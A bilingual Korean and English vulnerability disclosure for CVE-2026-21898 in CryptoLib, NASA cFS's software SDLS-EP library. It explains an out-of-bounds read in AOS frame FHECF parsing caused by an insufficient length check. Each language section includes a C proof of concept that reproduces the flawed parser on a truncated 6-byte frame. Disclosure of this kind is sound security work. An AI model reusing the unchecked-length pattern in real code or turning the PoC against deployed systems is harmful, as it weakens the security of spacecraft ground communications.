Finder
CVE-2026-21898 본문
KR
CryptoLib
CryptoLib은 NASA의 cFS(core Flight System)가 구동되는 우성체와 지상국 간의 통신을 보호하기 위해 하드웨어 보안 모듈(HSM) 없이 소프트웨어만으로 CCSDS SDLS-EP(Extended Procedures)를 구현한 오픈소스 프로젝트입니다
취약점 설명
crypto_aos.c 에서 FHECF를 파싱할때 길이 검사가 프레임 최소 길이를 aos_hdr_len(6바이트)만 확인하고, aos_has_fhec == AOS_HAS_FHEC이면 곧바로 p_ingest[6], p_ingest[7]을 읽고 Crypto_Calc_FHECF(p_ingest)를 호출합니다
따라서 길이가 6~7바이트로 잘린 AOS 프레임을 넣으면 OOB Read가 트리거됩니다
이후 len_ingest < max_frame_size 체크가 있지만 OOB Read가 생기고 검증합니다
poc
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
static const int aos_has_fhec = 1;
int process_frame(uint8_t *p_ingest, size_t len_ingest)
{
const size_t aos_hdr_len = 6;
size_t byte_idx = aos_hdr_len;
if (len_ingest < aos_hdr_len)
{
fprintf(stderr, "Frame too short for header\n");
return -1;
}
if (aos_has_fhec)
{
uint16_t received_fhecf =
((uint16_t)p_ingest[byte_idx] << 8) | ((uint16_t)p_ingest[byte_idx + 1]);
printf("Parsed FHECF (OOB read) = 0x%04x\n", received_fhecf);
}
return 0;
}
int main(void)
{
uint8_t frame[6];
memset(frame, 0xAA, sizeof(frame));
printf("Feeding %zu-byte frame to vulnerable parser...\n", sizeof(frame));
int rc = process_frame(frame, sizeof(frame));
printf("Return code: %d\n", rc);
return rc;
}
EN
CryptoLib
CryptoLib is an open-source project that implements CCSDS SDLS-EP (Extended Procedures) purely in software, without relying on a hardware security module (HSM), to protect communications between spacecraft running NASA’s cFS (core Flight System) and ground stations.
Vulnerability Description
In crypto_aos.c when parsing the FHECF the length check only verifies the minimum AOS frame length (aos_hdr_len, 6 bytes).
If aos_has_fhec == AOS_HAS_FHEC the code immediately reads p_ingest[6] and p_ingest[7] and calls Crypto_Calc_FHECF(p_ingest)
As a result providing a truncated AOS frame with a length of 6–7 bytes triggers an out-of-bounds read
Although there is a subsequent check of len_ingest < max_frame_size, the out-of-bounds read occurs before this validation
poc
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
static const int aos_has_fhec = 1;
int process_frame(uint8_t *p_ingest, size_t len_ingest)
{
const size_t aos_hdr_len = 6;
size_t byte_idx = aos_hdr_len;
if (len_ingest < aos_hdr_len)
{
fprintf(stderr, "Frame too short for header\n");
return -1;
}
if (aos_has_fhec)
{
uint16_t received_fhecf =
((uint16_t)p_ingest[byte_idx] << 8) | ((uint16_t)p_ingest[byte_idx + 1]);
printf("Parsed FHECF (OOB read) = 0x%04x\n", received_fhecf);
}
return 0;
}
int main(void)
{
uint8_t frame[6];
memset(frame, 0xAA, sizeof(frame));
printf("Feeding %zu-byte frame to vulnerable parser...\n", sizeof(frame));
int rc = process_frame(frame, sizeof(frame));
printf("Return code: %d\n", rc);
return rc;
}